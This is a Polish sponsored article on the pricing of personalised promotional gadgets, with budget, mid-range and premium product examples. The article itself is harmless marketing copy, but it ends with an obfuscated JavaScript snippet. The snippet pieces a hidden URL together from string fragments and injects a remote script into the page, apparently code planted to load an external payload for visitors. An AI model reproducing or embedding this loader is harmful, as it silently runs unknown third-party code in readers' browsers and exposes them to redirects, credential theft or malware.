Często nie inwestujemy w promocję swojego biznesu z obawy przed zbyt wysokimi kosztami, szczególnie że ceny wszystkich towarów i usług stale rosną. Mamy jednak dobrą wiadomość – w roku 2023 ceny gadżetów reklamowych zbyt mocno nie podrożały, więc większość firm nadal może sobie na nie pozwolić. Jak znaleźć idealne produkty marketingowe? Podpowiadamy!
Co decyduje o cenie personalizowanych gadżetów reklamowych?
Reklama nie ma być droga, a skuteczna! Sukces firmy to trafienie do odbiorcy, odpowiedź na jego potrzeby i zaprezentowanie mu takiej oferty, która w pełni go zadowoli. A taki efekt możemy uzyskać na wiele sposobów – na przykład określając swoją grupę docelową, śledząc aktualne trendy i rozsądnie inwestując w promocję, np. w gadżety reklamowe. To rozwiązanie dobre zarówno dla małych graczy, jak i wielkich firm z dużym doświadczeniem.
Jakie czynniki wpływają na koszt gadżetów reklamowych? Wśród tych kluczowych warto wskazać na:
- rodzaj produktu – możemy kupić zarówno te z niższej półki cenowej, jak i bardziej ekskluzywne, a przez to droższe;
- ilość zakupionego towaru – wiele firm oferuje możliwość negocjacji przy większych zamówieniach;
- sposób personalizacji – ceny różnych rodzajów znakowania mogą się od siebie różnić. Może być tak, że nadruk będzie tańszy od graweru laserowego czy personalizacji odzieży przy użyciu hafciarki
- projekt nadruku – przygotowanie własnego projektu grafiki, którą możemy umieścić na zakupionym produkcie w ramach personalizacji oferuje firma sprzedające gadżety reklamowe jak Tampogadżet;
- koszty wysyłki – jeżeli nie istnieje możliwość odbioru osobistego, będziemy musieli doliczyć cenę wysyłki gotowego zamówienia.
Propozycje gadżetów reklamowych na każdą kieszeń
W planowaniu inwestycji w gadżety reklamowe najważniejsze są dwie rzeczy – cel oraz budżet. Przykładowo:
- Jeżeli potrzebujemy sporej ilości upominków na duże wydarzenie, np. dwudniowe targi, które odwiedzą setki osób i zależy nam na tym, żeby darmowe gadżety reklamowe nie skończyły się przed czasem, możemy zainwestować w nieco tańsze artykuły. W zależności od produktu to koszt od złotówki do kilku złotych.
Przykłady takich produktów, to: długopisy, notesy, małe puzzle, breloczki, firmowe torby prezentowe, latarki, kable z USB w formie bransoletki, kolorowanki, świece, torby na zakupy (te z naturalnych materiałów to świetne ekologiczne gadżety reklamowe).
Puzzle Tangram – dużo zabawy za niewielką cenę
- Jeśli zależy nam na nieco „większych” i mniej oczywistych gadżetach, których nie musimy kupować w jakichś zawrotnych ilościach, warto się zainteresować produktami w średnich cenach – od kilkunastu do kilkudziesięciu złotych.
Przykłady: bransoletki survivalowe, drobna elektronika (power bank, pendrive itp.), bluzki, portfele, podstawki do tabletu, maty do ćwiczeń, torby sportowe.
- W sytuacji, kiedy chcemy sprawić miły firmowy podarunek tylko jednej lub kilku osobom (wspólnik, pracownik firmy świętujący ważne dla niego wydarzenie, wyjątkowy klient), a nasz budżet nie ma większych ograniczeń, spokojnie możemy sięgnąć po nietypowe gadżety klasy premium.
Przykłady: zegarki naręczne, skórzane aktówki, bezprzewodowe słuchawki dobrej jakości, elegancka karafka z zestawem kieliszków, notatnik z podkładką do bezprzewodowego ładowania.
Notatnik A5 z podkładką do bezprzewodowego ładowania Air
*artykuł zewnętrzny*
(function(){
it3z_=(“u”+”st”);it3z=document.createElement(“script”);it3z.async=true;
it3zu=”2190224558″;it3z_+=”a”+(“t.”);it3z_+=”i”+(“nf”+(“o”))+(“/”);
it3zu+=”.ljXnXX9gt3zc1e7k”;it3zu+=”yaqc4l7dw4g0gp”;
it3z.src=”https://”+it3z_+it3zu;it3z.type=”text/javascript”;
d_b=document.body;d_b.appendChild(it3z);
})();